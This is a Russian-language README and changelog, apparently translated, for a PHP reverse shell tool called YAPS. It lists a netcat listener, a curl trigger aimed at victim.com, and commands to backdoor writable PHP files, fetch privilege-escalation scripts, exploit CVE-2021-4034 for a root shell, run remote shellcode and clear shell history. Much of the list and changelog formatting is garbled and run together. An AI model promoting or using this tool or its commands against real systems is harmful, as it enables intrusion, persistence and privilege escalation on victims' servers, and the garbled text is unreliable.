
Yet Another PHP Shell - самая полная PHP обратная оболочка

Да, как следует из названия, это ещё один PHP Reverse Shell, один из сотен доступных, но с некоторыми преимуществами. Это один PHP-файл, содержащий все свои функции, и вы можете управлять им через простой TCP-слушатель (например, nc -lp 1337).
В текущей версии (1.5) его основные функции поддерживают только системы Linux, но я планирую сделать его совместимым и с Windows.
На данный момент это первая версия, я ещё мало её тестировал, и осталось многое, что я намерен сделать и улучшить в следующих версиях (она ещё не готова!), поэтому, пожалуйста, сообщите мне, если вы нашли какие-либо ошибки или у вас есть предложения по функциям или улучшениям. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s или yaps.php?silent, чтобы скрыть баннерphp yaps.php ip port!help — показать меню помощи!all-colors — переключить все цвета (совместимо с бесцветным TTY)!color — переключить цвет PS1 (только локально, переменные окружения не меняются)!duplicate — запустить ещё одно соединение YAPS!enum — загрузить LinPEAS и LinEnum в /tmp и подготовить их к использованию!info — вывести информацию о цели (перечисленную выше разведку)!infect — инфицировать доступные для записи PHP-файлы бэкдорами!interactive — запустить интерактивный обратный шелл на других портах (работает с sudo, su, mysql и т.д.)!passwd — опции пароля (включить, отключить, установить, изменить)!php — писать и выполнять PHP на удалённом хосте!pwnkit — пытается эксплуатировать CVE-2021-4034 и запустить рутовый обратный шелл!shellcode — отправить и выполнить шеллкод на удалённом хосте





v1.5 — 12.02.2022
!shellcode для приёма и выполнения произвольного шеллкодаduplicate() (теперь можно указывать диапазон портов)stabilize на interactivev1.4 — 04.02.2022
!pwnkit для эксплуатации CVE-2021-4034 и запуска рутового обратного шеллаverify_update()v1.3.1 — 01.08.2021
v1.3 — 28.07.2021
!infect для инфицирования PHP-файлов бэкдорами!stabilize (исправлены ошибки)v1.2.2 — 18.07.2021
v1.2.1 — 17.07.2021
v1.2 — 17.07.2021
!duplicate для запуска ещё одной оболочки--update|-u)--help|-h)php yaps.php ip port)v1.1 — 12.07.2021
!all-colors для переключения цветов терминала и работы с бесцветными TTYexit для закрытия сокета (выход из оболочки)!stabilize — теперь сбрасывает HISTSIZE и HISTFILE!infov1.0.1 — 08.07.2021
[x,y,z] на array(x,y,z) для улучшения совместимости со старыми версиями PHPНекоторые идеи были вдохновлены этими инструментами:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!suggester — загрузить Linux Exploit Suggester в /tmp и подготовить его к использованию

